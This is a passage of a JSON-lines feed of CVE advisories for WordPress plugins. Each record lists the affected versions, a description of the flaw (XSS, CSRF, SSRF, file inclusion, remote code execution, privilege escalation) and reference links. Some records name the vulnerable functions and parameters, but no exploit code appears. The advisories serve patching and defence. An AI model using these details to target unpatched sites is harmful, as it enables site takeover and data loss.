{"CVE_ID":"CVE-2022-4706","slug":"genesis-columns-advanced","versionEndExcluding":"2.0.4","description":"The Genesis Columns Advanced WordPress plugin before 2.0.4 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as a contributor to perform Stored Cross-Site Scripting attacks which could be used against high-privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30882a45-ca03-4ff1-a36d-758d9b9b641c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30882a45-ca03-4ff1-a36d-758d9b9b641c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11456","slug":"contest-code-checker","versionImpact":"2.0.3","versionEndExcluding":"2.0.4","description":"The Run Contests, Raffles, and Giveaways with ContestsWP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192738\\\/contest-code-checker\\\/trunk\\\/free\\\/admin\\\/prizes\\\/class-prizes-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192738\\\/contest-code-checker\\\/trunk\\\/free\\\/admin\\\/prizes\\\/class-prizes-table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b68ff1e-ef79-4c11-a73c-591177d8dffe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b68ff1e-ef79-4c11-a73c-591177d8dffe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2392","slug":"blocksy-companion","versionImpact":"2.0.31","versionEndExcluding":"2.0.32","description":"The Blocksy Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Newsletter widget in all versions up to, and including, 2.0.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b937cbfb-d43c-4cda-b247-921661cbc0ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b937cbfb-d43c-4cda-b247-921661cbc0ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051797%40blocksy-companion&new=3051797%40blocksy-companion&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051797%40blocksy-companion&new=3051797%40blocksy-companion&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5194","slug":"wp-map-block","versionImpact":"2.0.2","versionEndExcluding":"2.0.3","description":"The WP Map Block  WordPress plugin before 2.0.3 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f90b7ad6-e2a2-4833-a390-a78c64dc2382\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f90b7ad6-e2a2-4833-a390-a78c64dc2382\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3508","slug":"woocommerce-pre-orders","versionEndExcluding":"2.0.3","description":"The WooCommerce Pre-Orders WordPress plugin before 2.0.3 has a flawed CSRF check when processing its tab actions, which could allow attackers to make logged in admins email pre-orders customer, change the released date, mark all pre-orders of a specific product as complete or cancel via CSRF attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/064c7acb-db57-4537-8a6d-32f7ea31c738\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/064c7acb-db57-4537-8a6d-32f7ea31c738\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3507","slug":"woocommerce-pre-orders","versionEndExcluding":"2.0.3","description":"The WooCommerce Pre-Orders WordPress plugin before 2.0.3 has a flawed CSRF check when canceling pre-orders, which could allow attackers to make logged in admins cancel arbitrary pre-orders via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e72bbe9b-e51d-40ab-820d-404e0cb86ee6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e72bbe9b-e51d-40ab-820d-404e0cb86ee6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11877","slug":"cricket-score","versionImpact":"2.0.2","versionEndExcluding":"2.0.3","description":"The Cricket Live Score plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cricket_score' shortcode in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cricket-score\\\/tags\\\/2.0.2\\\/src\\\/connectFscore.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cricket-score\\\/tags\\\/2.0.2\\\/src\\\/connectFscore.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9fe750f-5d8f-4c47-9d75-d928f1367fa8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9fe750f-5d8f-4c47-9d75-d928f1367fa8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8491","slug":"easy-pdf-restaurant-menu-upload","versionImpact":"2.0.2","versionEndExcluding":"2.0.3","description":"The Easy restaurant menu manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.2. This is due to missing or incorrect nonce validation on the nsc_eprm_save_menu() function. This makes it possible for unauthenticated attackers to upload a menu file via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pdf-restaurant-menu-upload\\\/tags\\\/2.0.2\\\/class\\\/class-admin-settings-nsc_eprm.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pdf-restaurant-menu-upload\\\/tags\\\/2.0.2\\\/class\\\/class-admin-settings-nsc_eprm.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338246\\\/easy-pdf-restaurant-menu-upload\\\/trunk\\\/class\\\/class_admin_easy_pdf_restaurant_menu.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338246\\\/easy-pdf-restaurant-menu-upload\\\/trunk\\\/class\\\/class_admin_easy_pdf_restaurant_menu.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a349b220-5b42-4b98-869f-ce8399fe7ec9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a349b220-5b42-4b98-869f-ce8399fe7ec9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11069","slug":"wordpress-gdpr","versionImpact":"2.0.2","versionEndExcluding":"2.0.3","description":"The WordPress GDPR plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'WordPress_GDPR_Data_Delete::check_action' function in all versions up to, and including, 2.0.2. This makes it possible for unauthenticated attackers to delete arbitrary users.","recommendation":"Update to version 2.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a089026a-5da9-467c-a1e4-622bb74363e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a089026a-5da9-467c-a1e4-622bb74363e2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.welaunch.io\\\/en\\\/product\\\/wordpress-gdpr\\\/#changelog\",\"name\":\"https:\\\/\\\/www.welaunch.io\\\/en\\\/product\\\/wordpress-gdpr\\\/#changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10388","slug":"wordpress-gdpr","versionImpact":"2.0.2","versionEndExcluding":"2.0.3","description":"The WordPress GDPR plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gdpr_firstname' and 'gdpr_lastname' parameters in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf707d9b-2b96-4d1b-b798-38f7fe958eaf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf707d9b-2b96-4d1b-b798-38f7fe958eaf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.welaunch.io\\\/en\\\/product\\\/wordpress-gdpr\\\/#changelog\",\"name\":\"https:\\\/\\\/www.welaunch.io\\\/en\\\/product\\\/wordpress-gdpr\\\/#changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36738","slug":"cool-timeline","versionEndExcluding":"2.0.3","description":"The Cool Timeline (Horizontal & Vertical Timeline) plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0.2. This is due to missing or incorrect nonce validation on the ctl_save() function. This makes it possible for unauthenticated attackers to save field icons via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ce7c895-e94c-46bd-9de1-f5fde29c3475?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ce7c895-e94c-46bd-9de1-f5fde29c3475?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368335\\\/cool-timeline\\\/trunk\\\/fa-icons\\\/fa-icons-class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368335\\\/cool-timeline\\\/trunk\\\/fa-icons\\\/fa-icons-class.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1977","slug":"booking-manager","versionEndExcluding":"2.0.29","description":"The Booking Manager WordPress plugin before 2.0.29 does not validate URLs input in it's admin panel or in shortcodes for showing events from a remote .ics file, allowing an attacker with privileges as low as Subscriber to perform SSRF attacks on the sites internal network.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/842f3b1f-395a-4ea2-b7df-a36f70e8c790\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/842f3b1f-395a-4ea2-b7df-a36f70e8c790\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12413","slug":"marketking-multivendor-marketplace-for-woocommerce","versionImpact":"2.0.00","versionEndExcluding":"2.0.25","description":"The MarketKing \u2014 Ultimate WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions like 'marketking_delete_team_member', 'marketkingrejectuser', 'marketking_save_profile_settings', and many more in all versions up to, and including, 2.0.00. This makes it possible for unauthenticated attackers to delete users, update settings, approve users, and more.","recommendation":"Update to version 2.0.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212032\\\/marketking-multivendor-marketplace-for-woocommerce\\\/trunk\\\/includes\\\/class-marketking-core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212032\\\/marketking-multivendor-marketplace-for-woocommerce\\\/trunk\\\/includes\\\/class-marketking-core.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb809c9-7167-4333-969f-0141c96342bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb809c9-7167-4333-969f-0141c96342bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6700","slug":"wp-gdpr-compliance","versionImpact":"2.0.22","versionEndExcluding":"2.0.23","description":"The Cookie Information | Free GDPR Consent Solution plugin for WordPress is vulnerable to arbitrary option updates due to a missing capability check on its AJAX request handler in versions up to, and including, 2.0.22. This makes it possible for authenticated attackers, with subscriber-level access or higher, to edit arbitrary site options which can be used to create administrator accounts.","recommendation":"Update to version 2.0.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42a4ef37-c842-4925-b06a-3e6423337567?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42a4ef37-c842-4925-b06a-3e6423337567?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028096\\\/wp-gdpr-compliance\\\/trunk?contextall=1&old=2865555&old_path=%2Fwp-gdpr-compliance%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3028096\\\/wp-gdpr-compliance\\\/trunk?contextall=1&old=2865555&old_path=%2Fwp-gdpr-compliance%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6460","slug":"tradedoubler-affiliate-tracker","versionImpact":"2.0.21","versionEndExcluding":"2.0.22","description":"The Grow by Tradedoubler  WordPress plugin through 2.0.21 is vulnerable to Local File Inclusion via the component parameter. This makes it possible for attackers to include and execute PHP files on the server, allowing the execution of any PHP code in those files.","recommendation":"Update to version 2.0.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba2f53e0-30be-4f37-91bc-5fa151f1eee7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba2f53e0-30be-4f37-91bc-5fa151f1eee7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5637","slug":"market-exporter","versionImpact":"2.0.19","versionEndExcluding":"2.0.20","description":"The Market Exporter plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'remove_files' function in all versions up to, and including, 2.0.19. This makes it possible for authenticated attackers, with Subscriber-level access and above, to use path traversal to delete arbitrary files on the server.","recommendation":"Update to version 2.0.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3ea4bf9-e109-465e-890a-c2923089fb66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3ea4bf9-e109-465e-890a-c2923089fb66?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/market-exporter\\\/trunk\\\/includes\\\/class-restapi.php#L427\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/market-exporter\\\/trunk\\\/includes\\\/class-restapi.php#L427\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098360\\\/market-exporter\\\/trunk\\\/includes\\\/class-restapi.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098360\\\/market-exporter\\\/trunk\\\/includes\\\/class-restapi.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8490","slug":"propertyhive","versionImpact":"2.0.19","versionEndExcluding":"2.0.20","description":"The PropertyHive plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.19. This is due to missing or incorrect nonce validation on the 'save_account_details' function. This makes it possible for unauthenticated attackers to edit the name, email address, and password of an administrator account via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17c06c83-6707-4233-a1c3-ef4cdcf93982?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17c06c83-6707-4233-a1c3-ef4cdcf93982?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/propertyhive\\\/tags\\\/2.0.19\\\/includes\\\/class-ph-ajax.php#L1089\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/propertyhive\\\/tags\\\/2.0.19\\\/includes\\\/class-ph-ajax.php#L1089\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/propertyhive\\\/tags\\\/2.0.19\\\/includes\\\/class-ph-ajax.php#L976\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/propertyhive\\\/tags\\\/2.0.19\\\/includes\\\/class-ph-ajax.php#L976\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152548\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152548\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12338","slug":"website-toolbox-forums","versionImpact":"2.0.1","versionEndExcluding":"2.0.2","description":"The Website Toolbox Community plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018websitetoolbox_username\u2019 parameter in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/website-toolbox-forums\\\/trunk\\\/admin\\\/admin.php#L249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/website-toolbox-forums\\\/trunk\\\/admin\\\/admin.php#L249\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eae14ac7-ebc1-45a1-b0dd-fec2bbb14460?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eae14ac7-ebc1-45a1-b0dd-fec2bbb14460?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6673","slug":"easy-pdf-restaurant-menu-upload","versionImpact":"2.0.1","versionEndExcluding":"2.0.2","description":"The Easy restaurant menu manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's nsc_eprm_menu_link shortcode in versions up to, and including 2.0.1, due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pdf-restaurant-menu-upload\\\/tags\\\/2.0.0\\\/class\\\/class_admin_easy_pdf_restaurant_menu.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pdf-restaurant-menu-upload\\\/tags\\\/2.0.0\\\/class\\\/class_admin_easy_pdf_restaurant_menu.php#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318491\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318491\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/382de43a-a714-4538-be12-76e74ad77327?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/382de43a-a714-4538-be12-76e74ad77327?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6365","slug":"woo-product-tables","versionImpact":"2.0.1","versionEndExcluding":"2.0.2","description":"The Product Table by WBW plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.0.1 via the 'saveCustomTitle' function. This is due to missing authorization and lack of sanitization of appended data in the languages\/customTitle.php file. This makes it possible for unauthenticated attackers to execute code on the server.","recommendation":"Update to version 2.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba84711f-bdbe-46d3-a9a3-cc2b1dcefd1a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba84711f-bdbe-46d3-a9a3-cc2b1dcefd1a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-tables\\\/trunk\\\/modules\\\/wootablepress\\\/models\\\/wootablepress.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-tables\\\/trunk\\\/modules\\\/wootablepress\\\/models\\\/wootablepress.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-tables\\\/trunk\\\/languages\\\/customTitle.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-tables\\\/trunk\\\/languages\\\/customTitle.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113335\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113335\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8797","slug":"wp-booking-system","versionImpact":"2.0.19.8","versionEndExcluding":"2.0.19.9","description":"The WP Booking System \u2013 Booking Calendar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.19.8. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.19.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bea55b5-b2d7-4eaf-8868-d2645ce18619?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bea55b5-b2d7-4eaf-8868-d2645ce18619?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-booking-system\\\/tags\\\/2.0.19.10\\\/includes\\\/modules\\\/update-checker\\\/views\\\/view-register-website.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-booking-system\\\/tags\\\/2.0.19.10\\\/includes\\\/modules\\\/update-checker\\\/views\\\/view-register-website.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150487%40wp-booking-system&new=3150487%40wp-booking-system&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150487%40wp-booking-system&new=3150487%40wp-booking-system&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3761","slug":"my-tickets","versionImpact":"2.0.16","versionEndExcluding":"2.0.17","description":"The My Tickets \u2013 Accessible Event Ticketing plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.0.16. This is due to the mt_save_profile() function not appropriately restricting access to unauthorized users to update roles. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update their role to that of an administrator.","recommendation":"Update to version 2.0.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3280248\\\/my-tickets\\\/trunk\\\/my-tickets.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3280248\\\/my-tickets\\\/trunk\\\/my-tickets.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d875c23-3d8a-4f82-bea3-1c46b5045d94?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d875c23-3d8a-4f82-bea3-1c46b5045d94?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10695","slug":"futurio-extra","versionImpact":"2.0.13","versionEndExcluding":"2.0.14","description":"The Futurio Extra plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.0.13 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts that they should not have access to.","recommendation":"Update to version 2.0.14, or a newer patched 